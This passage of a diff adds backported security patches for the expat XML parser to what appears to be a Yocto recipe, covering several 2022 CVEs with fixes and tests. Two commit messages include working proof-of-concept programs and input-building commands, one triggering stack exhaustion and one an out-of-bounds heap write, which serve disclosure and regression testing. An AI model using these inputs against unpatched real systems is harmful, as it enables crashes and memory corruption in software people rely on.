38 parser = parserCreate(encodingName, &parser->m_mem, tmp, newDtd);
39 } else {
40 parser = parserCreate(encodingName, &parser->m_mem, NULL, newDtd);
41From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
42From: Sebastian Pipping <sebastian@pipping.org>
43Date: Sat, 12 Feb 2022 01:09:29 +0100
44Subject: [PATCH] lib: Protect against malicious namespace declarations
45 (CVE-2022-25236)
46
47---
48 expat/lib/xmlparse.c | 11 +++++++++++
49 1 file changed, 11 insertions(+)
50
51diff --git a/lib/xmlparse.c b/lib/xmlparse.c
52index c768f856..a3aef88c 100644
53--- a/lib/xmlparse.c
54+++ b/lib/xmlparse.c
55@@ -3754,6 +3754,17 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
56 if (! mustBeXML && isXMLNS
57 && (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
58 isXMLNS = XML_FALSE;
59+
60+ // NOTE: While Expat does not validate namespace URIs against RFC 3986,
61+ // we have to at least make sure that the XML processor on top of
62+ // Expat (that is splitting tag names by namespace separator into
63+ // 2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
64+ // by an attacker putting additional namespace separator characters
65+ // into namespace declarations. That would be ambiguous and not to
66+ // be expected.
67+ if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
68+ return XML_ERROR_SYNTAX;
69+ }
70 }
71 isXML = isXML && len == xmlLen;
72 isXMLNS = isXMLNS && len == xmlnsLen;
73From 2de077423fb22750ebea599677d523b53cb93b1d Mon Sep 17 00:00:00 2001
74From: Sebastian Pipping <sebastian@pipping.org>
75Date: Sat, 12 Feb 2022 00:51:43 +0100
76Subject: [PATCH] tests: Cover CVE-2022-25236
77
78---
79 expat/tests/runtests.c | 30 ++++++++++++++++++++++++++++++
80 1 file changed, 30 insertions(+)
81
82diff --git a/tests/runtests.c b/tests/runtests.c
83index d07203f2..bc5344b1 100644
84--- a/tests/runtests.c
85+++ b/tests/runtests.c
86@@ -7220,6 +7220,35 @@ START_TEST(test_ns_double_colon_doctype) {
87 }
88 END_TEST
89
90+START_TEST(test_ns_separator_in_uri) {
91+ struct test_case {
92+ enum XML_Status expectedStatus;
93+ const char *doc;
94+ };
95+ struct test_case cases[] = {
96+ {XML_STATUS_OK, "<doc xmlns='one_two' />"},
97+ {XML_STATUS_ERROR, "<doc xmlns='one&#x0A;two' />"},
98+ };
99+
100+ size_t i = 0;
101+ size_t failCount = 0;
102+ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
103+ XML_Parser parser = XML_ParserCreateNS(NULL, '\n');
104+ XML_SetElementHandler(parser, dummy_start_element, dummy_end_element);
105+ if (XML_Parse(parser, cases[i].doc, (int)strlen(cases[i].doc),
106+ /*isFinal*/ XML_TRUE)
107+ != cases[i].expectedStatus) {
108+ failCount++;
109+ }
110+ XML_ParserFree(parser);
111+ }
112+
113+ if (failCount) {
114+ fail("Namespace separator handling is broken");
115+ }
116+}
117+END_TEST
118+
119 /* Control variable; the number of times duff_allocator() will successfully
120 * allocate */
121 #define ALLOC_ALWAYS_SUCCEED (-1)
122@@ -11905,6 +11934,7 @@ make_suite(void) {
123 tcase_add_test(tc_namespace, test_ns_utf16_doctype);
124 tcase_add_test(tc_namespace, test_ns_invalid_doctype);
125 tcase_add_test(tc_namespace, test_ns_double_colon_doctype);
126+ tcase_add_test(tc_namespace, test_ns_separator_in_uri);
127
128 suite_add_tcase(s, tc_misc);
129 tcase_add_checked_fixture(tc_misc, NULL, basic_teardown);
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
new file mode 100644
index 0000000000..af255e8cb5
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
@@ -0,0 +1,131 @@
1From b12f34fe32821a69dc12ff9a021daca0856de238 Mon Sep 17 00:00:00 2001
2From: Samanta Navarro <ferivoz@riseup.net>
3Date: Sat, 19 Feb 2022 23:59:25 +0000
4Subject: [PATCH] Fix build_model regression.
5
6The iterative approach in build_model failed to fill children arrays
7correctly. A preorder traversal is not required and turned out to be the
8culprit. Use an easier algorithm:
9
10Add nodes from scaffold tree starting at index 0 (root) to the target
11array whenever children are encountered. This ensures that children
12are adjacent to each other. This complies with the recursive version.
13
14Store only the scaffold index in numchildren field to prevent a direct
15processing of these children, which would require a recursive solution.
16This allows the algorithm to iterate through the target array from start
17to end without jumping back and forth, converting on the fly.
18
19Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
20---
21 lib/xmlparse.c | 79 ++++++++++++++++++++++++++------------------
22 1 file changed, 47 insertions(+), 32 deletions(-)
23
24diff --git a/lib/xmlparse.c b/lib/xmlparse.c
25index c479a258..84885b5a 100644
26--- a/lib/xmlparse.c
27+++ b/lib/xmlparse.c
28@@ -7373,39 +7373,58 @@ build_model(XML_Parser parser) {
29 *
30 * The iterative approach works as follows:
31 *
32- * - We use space in the target array for building a temporary stack structure
33- * while that space is still unused.
34- * The stack grows from the array's end downwards and the "actual data"
35- * grows from the start upwards, sequentially.
36- * (Because stack grows downwards, pushing onto the stack is a decrement
37- * while popping off the stack is an increment.)
38+ * - We have two writing pointers, both walking up the result array; one does
39+ * the work, the other creates "jobs" for its colleague to do, and leads
40+ * the way:
41 *
42- * - A stack element appears as a regular XML_Content node on the outside,
43- * but only uses a single field -- numchildren -- to store the source
44- * tree node array index. These are the breadcrumbs leading the way back
45- * during pre-order (node first) depth-first traversal.
46+ * - The faster one, pointer jobDest, always leads and writes "what job
47+ * to do" by the other, once they reach that place in the
48+ * array: leader "jobDest" stores the source node array index (relative
49+ * to array dtd->scaffold) in field "numchildren".
50 *
51- * - The reason we know the stack will never grow into (or overlap with)
52- * the area with data of value at the start of the array is because
53- * the overall number of elements to process matches the size of the array,
54- * and the sum of fully processed nodes and yet-to-be processed nodes
55- * on the stack, cannot be more than the total number of nodes.
56- * It is possible for the top of the stack and the about-to-write node
57- * to meet, but that is safe because we get the source index out
58- * before doing any writes on that node.
59+ * - The slower one, pointer dest, looks at the value stored in the
60+ * "numchildren" field (which actually holds a source node array index
61+ * at that time) and puts the real data from dtd->scaffold in.
62+ *
63+ * - Before the loop starts, jobDest writes source array index 0
64+ * (where the root node is located) so that dest will have something to do
65+ * when it starts operation.
66+ *
67+ * - Whenever nodes with children are encountered, jobDest appends
68+ * them as new jobs, in order. As a result, tree node siblings are
69+ * adjacent in the resulting array, for example:
70+ *
71+ * [0] root, has two children
72+ * [1] first child of 0, has three children
73+ * [3] first child of 1, does not have children
74+ * [4] second child of 1, does not have children
75+ * [5] third child of 1, does not have children
76+ * [2] second child of 0, does not have children
77+ *
78+ * Or (the same data) presented in flat array view:
79+ *
80+ * [0] root, has two children
81+ *
82+ * [1] first child of 0, has three children
83+ * [2] second child of 0, does not have children
84+ *
85+ * [3] first child of 1, does not have children
86+ * [4] second child of 1, does not have children
87+ * [5] third child of 1, does not have children
88+ *
89+ * - The algorithm repeats until all target array indices have been processed.
90 */
91 XML_Content *dest = ret; /* tree node writing location, moves upwards */
92 XML_Content *const destLimit = &ret[dtd->scaffCount];
93- XML_Content *const stackBottom = &ret[dtd->scaffCount];
94- XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
95+ XML_Content *jobDest = ret; /* next free writing location in target array */
96 str = (XML_Char *)&ret[dtd->scaffCount];
97
98- /* Push source tree root node index onto the stack */
99- (--stackTop)->numchildren = 0;
100+ /* Add the starting job, the root node (index 0) of the source tree */
101+ (jobDest++)->numchildren = 0;
102
103 for (; dest < destLimit; dest++) {
104- /* Pop source tree node index off the stack */
105- const int src_node = (int)(stackTop++)->numchildren;
106+ /* Retrieve source tree array index from job storage */
107+ const int src_node = (int)dest->numchildren;
108
109 /* Convert item */
110 dest->type = dtd->scaffold[src_node].type;
111@@ -7427,16 +7446,12 @@ build_model(XML_Parser parser) {
112 int cn;
113 dest->name = NULL;
114 dest->numchildren = dtd->scaffold[src_node].childcnt;
115- dest->children = &dest[1];
116+ dest->children = jobDest;
117
118- /* Push children to the stack
119- * in a way where the first child ends up at the top of the
120- * (downwards growing) stack, in order to be processed first. */
121- stackTop -= dest->numchildren;
122+ /* Append scaffold indices of children to array */
123 for (i = 0, cn = dtd->scaffold[src_node].firstchild;
124- i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
125- (stackTop + i)->numchildren = (unsigned int)cn;
126- }
127+ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib)
128+ (jobDest++)->numchildren = (unsigned int)cn;
129 }
130 }
131
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313.patch b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
new file mode 100644
index 0000000000..470d66e9dd
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
@@ -0,0 +1,230 @@
1From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
2From: Samanta Navarro <ferivoz@riseup.net>
3Date: Tue, 15 Feb 2022 11:54:29 +0000
4Subject: [PATCH] Prevent stack exhaustion in build_model
5
6It is possible to trigger stack exhaustion in build_model function if
7depth of nested children in DTD element is large enough. This happens
8because build_node is a recursively called function within build_model.
9
10The code has been adjusted to run iteratively. It uses the already
11allocated heap space as temporary stack (growing from top to bottom).
12
13Output is identical to recursive version. No new fields in data
14structures were added, i.e. it keeps full API and ABI compatibility.
15Instead the numchildren variable is used to temporarily keep the
16index of items (uint vs int).
17
18Documentation and readability improvements kindly added by Sebastian.
19
20Proof of Concept:
21
221. Compile poc binary which parses XML file line by line
23
24```
25cat > poc.c << EOF
26 #include <err.h>
27 #include <expat.h>
28 #include <stdio.h>
29
30 XML_Parser parser;
31
32 static void XMLCALL
33 dummy_element_decl_handler(void *userData, const XML_Char *name,
34 XML_Content *model) {
35 XML_FreeContentModel(parser, model);
36 }
37
38 int main(int argc, char *argv[]) {
39 FILE *fp;
40 char *p = NULL;
41 size_t s = 0;
42 ssize_t l;
43 if (argc != 2)
44 errx(1, "usage: poc poc.xml");
45 if ((parser = XML_ParserCreate(NULL)) == NULL)
46 errx(1, "XML_ParserCreate");
47 XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
48 if ((fp = fopen(argv[1], "r")) == NULL)
49 err(1, "fopen");
50 while ((l = getline(&p, &s, fp)) > 0)
51 if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
52 errx(1, "XML_Parse");
53 XML_ParserFree(parser);
54 free(p);
55 fclose(fp);
56 return 0;
57 }
58EOF
59cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
60```
61
622. Create XML file with a lot of nested groups in DTD element
63
64```
65cat > poc.xml.zst.b64 << EOF
66KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
67ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
68ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
69EOF
70base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
71```
72
733. Run Proof of Concept
74
75```
76./poc poc.xml
77```
78
79Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
80
81Upstream-Status: Backport
82https://github.com/libexpat/libexpat/pull/558/commits/9b4ce651b26557f16103c3a366c91934ecd439ab
83
84CVE: CVE-2022-25313
85
86Signed-off-by: Steve Sakoman <steve@sakoman.com>
87
88---
89 expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
90 1 file changed, 79 insertions(+), 37 deletions(-)
91
92diff --git a/lib/xmlparse.c b/lib/xmlparse.c
93index 4b43e613..594cf12c 100644
94--- a/lib/xmlparse.c
95+++ b/lib/xmlparse.c
96@@ -7317,44 +7317,15 @@ nextScaffoldPart(XML_Parser parser) {
97 return next;
98 }
99
100-static void
101-build_node(XML_Parser parser, int src_node, XML_Content *dest,
102- XML_Content **contpos, XML_Char **strpos) {
103- DTD *const dtd = parser->m_dtd; /* save one level of indirection */
104- dest->type = dtd->scaffold[src_node].type;
105- dest->quant = dtd->scaffold[src_node].quant;
106- if (dest->type == XML_CTYPE_NAME) {
107- const XML_Char *src;
108- dest->name = *strpos;
109- src = dtd->scaffold[src_node].name;
110- for (;;) {
111- *(*strpos)++ = *src;
112- if (! *src)
113- break;
114- src++;
115- }
116- dest->numchildren = 0;
117- dest->children = NULL;
118- } else {
119- unsigned int i;
120- int cn;
121- dest->numchildren = dtd->scaffold[src_node].childcnt;
122- dest->children = *contpos;
123- *contpos += dest->numchildren;
124- for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
125- i++, cn = dtd->scaffold[cn].nextsib) {
126- build_node(parser, cn, &(dest->children[i]), contpos, strpos);
127- }
128- dest->name = NULL;
129- }
130-}
131-
132 static XML_Content *
133 build_model(XML_Parser parser) {
134+ /* Function build_model transforms the existing parser->m_dtd->scaffold
135+ * array of CONTENT_SCAFFOLD tree nodes into a new array of
136+ * XML_Content tree nodes followed by a gapless list of zero-terminated
137+ * strings. */
138 DTD *const dtd = parser->m_dtd; /* save one level of indirection */
139 XML_Content *ret;
140- XML_Content *cpos;
141- XML_Char *str;
142+ XML_Char *str; /* the current string writing location */
143
144 /* Detect and prevent integer overflow.
145 * The preprocessor guard addresses the "always false" warning
146@@ -7380,10 +7351,81 @@ build_model(XML_Parser parser) {
147 if (! ret)
148 return NULL;
149
150- str = (XML_Char *)(&ret[dtd->scaffCount]);
151- cpos = &ret[1];
152+ /* What follows is an iterative implementation (of what was previously done
153+ * recursively in a dedicated function called "build_node". The old recursive
154+ * build_node could be forced into stack exhaustion from input as small as a
155+ * few megabyte, and so that was a security issue. Hence, a function call
156+ * stack is avoided now by resolving recursion.)
157+ *
158+ * The iterative approach works as follows:
159+ *
160+ * - We use space in the target array for building a temporary stack structure
161+ * while that space is still unused.
162+ * The stack grows from the array's end downwards and the "actual data"
163+ * grows from the start upwards, sequentially.
164+ * (Because stack grows downwards, pushing onto the stack is a decrement
165+ * while popping off the stack is an increment.)
166+ *
167+ * - A stack element appears as a regular XML_Content node on the outside,
168+ * but only uses a single field -- numchildren -- to store the source
169+ * tree node array index. These are the breadcrumbs leading the way back
170+ * during pre-order (node first) depth-first traversal.
171+ *
172+ * - The reason we know the stack will never grow into (or overlap with)
173+ * the area with data of value at the start of the array is because
174+ * the overall number of elements to process matches the size of the array,
175+ * and the sum of fully processed nodes and yet-to-be processed nodes
176+ * on the stack, cannot be more than the total number of nodes.
177+ * It is possible for the top of the stack and the about-to-write node
178+ * to meet, but that is safe because we get the source index out
179+ * before doing any writes on that node.
180+ */
181+ XML_Content *dest = ret; /* tree node writing location, moves upwards */
182+ XML_Content *const destLimit = &ret[dtd->scaffCount];
183+ XML_Content *const stackBottom = &ret[dtd->scaffCount];
184+ XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
185+ str = (XML_Char *)&ret[dtd->scaffCount];
186+
187+ /* Push source tree root node index onto the stack */
188+ (--stackTop)->numchildren = 0;
189+
190+ for (; dest < destLimit; dest++) {
191+ /* Pop source tree node index off the stack */
192+ const int src_node = (int)(stackTop++)->numchildren;
193+
194+ /* Convert item */
195+ dest->type = dtd->scaffold[src_node].type;
196+ dest->quant = dtd->scaffold[src_node].quant;
197+ if (dest->type == XML_CTYPE_NAME) {
198+ const XML_Char *src;
199+ dest->name = str;
200+ src = dtd->scaffold[src_node].name;
201+ for (;;) {
202+ *str++ = *src;
203+ if (! *src)
204+ break;
205+ src++;
206+ }
207+ dest->numchildren = 0;
208+ dest->children = NULL;
209+ } else {
210+ unsigned int i;
211+ int cn;
212+ dest->name = NULL;
213+ dest->numchildren = dtd->scaffold[src_node].childcnt;
214+ dest->children = &dest[1];
215+
216+ /* Push children to the stack
217+ * in a way where the first child ends up at the top of the
218+ * (downwards growing) stack, in order to be processed first. */
219+ stackTop -= dest->numchildren;
220+ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
221+ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
222+ (stackTop + i)->numchildren = (unsigned int)cn;
223+ }
224+ }
225+ }
226
227- build_node(parser, 0, ret, &cpos, &str);
228 return ret;
229 }
230
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25314.patch b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
new file mode 100644
index 0000000000..2f713ebb54
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
@@ -0,0 +1,32 @@
1From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
2From: Samanta Navarro <ferivoz@riseup.net>
3Date: Tue, 15 Feb 2022 11:56:57 +0000
4Subject: [PATCH] Prevent integer overflow in copyString
5
6The copyString function is only used for encoding string supplied by
7the library user.
8
9Upstream-Status: Backport
10https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd
11
12CVE: CVE-2022-25314
13
14Signed-off-by: Steve Sakoman <steve@sakoman.com>
15
16---
17 expat/lib/xmlparse.c | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/lib/xmlparse.c b/lib/xmlparse.c
21index 4b43e613..a39377c2 100644
22--- a/lib/xmlparse.c
23+++ b/lib/xmlparse.c
24@@ -7412,7 +7412,7 @@ getElementType(XML_Parser parser, const ENCODING *enc, const char *ptr,
25
26 static XML_Char *
27 copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
28- int charsRequired = 0;
29+ size_t charsRequired = 0;
30 XML_Char *result;
31
32 /* First determine how long the string is */
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25315.patch b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
new file mode 100644
index 0000000000..a39771d28a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
@@ -0,0 +1,145 @@
1From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
2From: Samanta Navarro <ferivoz@riseup.net>
3Date: Tue, 15 Feb 2022 11:55:46 +0000
4Subject: [PATCH] Prevent integer overflow in storeRawNames
5
6It is possible to use an integer overflow in storeRawNames for out of
7boundary heap writes. Default configuration is affected. If compiled
8with XML_UNICODE then the attack does not work. Compiling with
9-fsanitize=address confirms the following proof of concept.
10
11The problem can be exploited by abusing the m_buffer expansion logic.
12Even though the initial size of m_buffer is a power of two, eventually
13it can end up a little bit lower, thus allowing allocations very close
14to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
15names can be parsed which are almost INT_MAX in size.
16
17Unfortunately (from an attacker point of view) INT_MAX/2 is also a
18limitation in string pools. Having a tag name of INT_MAX/2 characters
19or more is not possible.
20
21Expat can convert between different encodings. UTF-16 documents which
22contain only ASCII representable characters are twice as large as their
23ASCII encoded counter-parts.
24
25The proof of concept works by taking these three considerations into
26account:
27
281. Move the m_buffer size slightly below a power of two by having a
29 short root node <a>. This allows the m_buffer to grow very close
30 to INT_MAX.
312. The string pooling forbids tag names longer than or equal to
32 INT_MAX/2, so keep the attack tag name smaller than that.
333. To be able to still overflow INT_MAX even though the name is
34 limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
35 which only contains ASCII characters. UTF-16 always stores two
36 bytes per character while the tag name is converted to using only
37 one. Our attack node byte count must be a bit higher than
38 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
39 in sum can overflow INT_MAX.
40
41Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
42without running into INT_MAX boundary check. The string pooling is
43able to store INT_MAX/3 as tag name because the amount is below
44INT_MAX/2 limitation. And creating the sum of both eventually overflows
45in storeRawNames.
46
47Proof of Concept:
48
491. Compile expat with -fsanitize=address.
50
512. Create Proof of Concept binary which iterates through input
52 file 16 MB at once for better performance and easier integer
53 calculations:
54
55```
56cat > poc.c << EOF
57 #include <err.h>
58 #include <expat.h>
59 #include <stdlib.h>
60 #include <stdio.h>
61
62 #define CHUNK (16 * 1024 * 1024)
63 int main(int argc, char *argv[]) {
64 XML_Parser parser;
65 FILE *fp;
66 char *buf;
67 int i;
68
69 if (argc != 2)
70 errx(1, "usage: poc file.xml");
71 if ((parser = XML_ParserCreate(NULL)) == NULL)
72 errx(1, "failed to create expat parser");
73 if ((fp = fopen(argv[1], "r")) == NULL) {
74 XML_ParserFree(parser);
75 err(1, "failed to open file");
76 }
77 if ((buf = malloc(CHUNK)) == NULL) {
78 fclose(fp);
79 XML_ParserFree(parser);
80 err(1, "failed to allocate buffer");
81 }
82 i = 0;
83 while (fread(buf, CHUNK, 1, fp) == 1) {
84 printf("iteration %d: XML_Parse returns %d\n", ++i,
85 XML_Parse(parser, buf, CHUNK, XML_FALSE));
86 }
87 free(buf);
88 fclose(fp);
89 XML_ParserFree(parser);
90 return 0;
91 }
92EOF
93gcc -fsanitize=address -lexpat -o poc poc.c
94```
95
963. Construct specially prepared UTF-16 XML file:
97
98```
99dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
100echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
101echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
102iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
103```
104
1054. Run proof of concept:
106
107```
108./poc poc-utf16.xml
109```
110
111Upstream-Status: Backport
112https://github.com/libexpat/libexpat/pull/559/commits/eb0362808b4f9f1e2345a0cf203b8cc196d776d9
113
114CVE: CVE-2022-25315
115
116Signed-off-by: Steve Sakoman <steve@sakoman.com>
117---
118 lib/xmlparse.c | 7 ++++++-
119 1 file changed, 6 insertions(+), 1 deletion(-)
120
121diff --git a/lib/xmlparse.c b/lib/xmlparse.c
122index 4b43e613..f34d6ab5 100644
123--- a/lib/xmlparse.c
124+++ b/lib/xmlparse.c
125@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
126 while (tag) {
127 int bufSize;
128 int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
129+ size_t rawNameLen;
130 char *rawNameBuf = tag->buf + nameLen;
131 /* Stop if already stored. Since m_tagStack is a stack, we can stop
132 at the first entry that has already been copied; everything
133@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
134 /* For re-use purposes we need to ensure that the
135 size of tag->buf is a multiple of sizeof(XML_Char).
136 */
137- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
138+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
139+ /* Detect and prevent integer overflow. */
140+ if (rawNameLen > (size_t)INT_MAX - nameLen)
141+ return XML_FALSE;
142+ bufSize = nameLen + (int)rawNameLen;
143 if (bufSize > tag->bufEnd - tag->buf) {
144 char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
145 if (temp == NULL)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-40674.patch b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
new file mode 100644
index 0000000000..8b95f5f198
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
@@ -0,0 +1,53 @@
1From 4a32da87e931ba54393d465bb77c40b5c33d343b Mon Sep 17 00:00:00 2001
2From: Rhodri James <rhodri@wildebeest.org.uk>
3Date: Wed, 17 Aug 2022 18:26:18 +0100
4Subject: [PATCH] Ensure raw tagnames are safe exiting internalEntityParser
5
6It is possible to concoct a situation in which parsing is
7suspended while substituting in an internal entity, so that
8XML_ResumeParser directly uses internalEntityProcessor as
9its processor. If the subsequent parse includes some unclosed
10tags, this will return without calling storeRawNames to ensure
11that the raw versions of the tag names are stored in memory other
12than the parse buffer itself. If the parse buffer is then changed
13or reallocated (for example if processing a file line by line),
14badness will ensue.
15
16This patch ensures storeRawNames is always called when needed
17after calling doContent. The earlier call do doContent does
18not need the same protection; it only deals with entity
19substitution, which cannot leave unbalanced tags, and in any
20case the raw names will be pointing into the stored entity
21value not the parse buffer.
22
23Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/4a32da87e931ba54393d465bb77c40b5c33d343b]
24CVE: CVE-2022-40674
25Signed-off-by: Virendra Thakur <virendrak@kpit.com>
26---
27 expat/lib/xmlparse.c | 13 +++++++++----
28 1 file changed, 9 insertions(+), 4 deletions(-)
29
30Index: expat/lib/xmlparse.c
31===================================================================
32--- a/lib/xmlparse.c
33+++ b/lib/xmlparse.c
34@@ -5657,10 +5657,15 @@ internalEntityProcessor(XML_Parser parse
35 {
36 parser->m_processor = contentProcessor;
37 /* see externalEntityContentProcessor vs contentProcessor */
38- return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
39- s, end, nextPtr,
40- (XML_Bool)! parser->m_parsingStatus.finalBuffer,
41- XML_ACCOUNT_DIRECT);
42+ result = doContent(parser, parser->m_parentParser ? 1 : 0,
43+ parser->m_encoding, s, end, nextPtr,
44+ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
45+ XML_ACCOUNT_DIRECT);
46+ if (result == XML_ERROR_NONE) {
47+ if (! storeRawNames(parser))
48+ return XML_ERROR_NO_MEMORY;
49+ }
50+ return result;
51 }
52 }
53
diff --git a/meta/recipes-core/expat/expat/CVE-2022-43680.patch b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
new file mode 100644
index 0000000000..6f93bc3ed7
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
@@ -0,0 +1,33 @@
1From 5290462a7ea1278a8d5c0d5b2860d4e244f997e4 Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Tue, 20 Sep 2022 02:44:34 +0200
4Subject: [PATCH] lib: Fix overeager DTD destruction in
5 XML_ExternalEntityParserCreate
6
7CVE: CVE-2022-43680
8Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4.patch]
9Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
10Comments: Hunk refreshed
11---
12 lib/xmlparse.c | 8 ++++++++
13 1 file changed, 8 insertions(+)
14
15diff --git a/lib/xmlparse.c b/lib/xmlparse.c
16index aacd6e7fc..57bf103cc 100644
17--- a/lib/xmlparse.c
18+++ b/lib/xmlparse.c
19@@ -1035,6 +1035,14 @@ parserCreate(const XML_Char *encodingNam
20 parserInit(parser, encodingName);
21
22 if (encodingName && ! parser->m_protocolEncodingName) {
23+ if (dtd) {
24+ // We need to stop the upcoming call to XML_ParserFree from happily
25+ // destroying parser->m_dtd because the DTD is shared with the parent
26+ // parser and the only guard that keeps XML_ParserFree from destroying
27+ // parser->m_dtd is parser->m_isParamEntity but it will be set to
28+ // XML_TRUE only later in XML_ExternalEntityParserCreate (or not at all).
29+ parser->m_dtd = NULL;
30+ }
31 XML_ParserFree(parser);
32 return NULL;
33 }
diff --git a/meta/recipes-core/expat/expat/libtool-tag.patch b/meta/recipes-core/expat/expat/libtool-tag.patch
index 0a0aed23e5..c59ccbbede 100644
--- a/meta/recipes-core/expat/expat/libtool-tag.patch
+++ b/meta/recipes-core/expat/expat/libtool-tag.patch
@@ -1,30 +1,27 @@
1From 10342e6b600858b091bc7771e454d9e06af06410 Mon Sep 17 00:00:00 2001 1From da433dbe79f2d4d5d7d79869c669594c99c5de9c Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com> 2From: Jasper Orschulko <jasper@fancydomain.eu>
3Date: Thu, 2 Nov 2017 18:20:57 +0800 3Date: Wed, 16 Jun 2021 19:00:30 +0200
4Subject: [PATCH] Add CC tag to build 4Subject: [PATCH] Add CC tag to build
5 5
6Add CC tag to build
7
8Upstream-Status: Pending 6Upstream-Status: Pending
9Signed-off-by: Khem Raj <raj.khem@gmail.com> 7Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
10Signed-off-by: Dengke Du <dengke.du@windriver.com>
11--- 8---
12 Makefile.in | 2 +- 9 Makefile.am | 2 +-
13 1 file changed, 1 insertion(+), 1 deletion(-) 10 1 file changed, 1 insertion(+), 1 deletion(-)
14 11
15diff --git a/Makefile.in b/Makefile.in 12diff --git a/Makefile.am b/Makefile.am
16index 9560a95..d444bd6 100644 13index 5e1d37dd..f7a6dece 100644
17--- a/Makefile.in 14--- a/Makefile.am
18+++ b/Makefile.in 15+++ b/Makefile.am
19@@ -319,7 +319,7 @@ LIBCURRENT = @LIBCURRENT@ 16@@ -36,7 +36,7 @@ AUTOMAKE_OPTIONS = \
20 LIBOBJS = @LIBOBJS@ 17 subdir-objects
21 LIBREVISION = @LIBREVISION@ 18
22 LIBS = @LIBS@ 19 ACLOCAL_AMFLAGS = -I m4
23-LIBTOOL = @LIBTOOL@ 20-LIBTOOLFLAGS = --verbose
24+LIBTOOL = @LIBTOOL@ --tag CC 21+LIBTOOLFLAGS = --verbose --tag=CC
25 LIPO = @LIPO@ 22
26 LN_S = @LN_S@ 23 SUBDIRS = lib # lib goes first to build first
27 LTLIBOBJS = @LTLIBOBJS@ 24 if WITH_EXAMPLES
28-- 25--
292.7.4 262.32.0
30 27
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index 8f3db41352..8a5006e59a 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -1,22 +1,35 @@
1SUMMARY = "A stream-oriented XML parser library" 1SUMMARY = "A stream-oriented XML parser library"
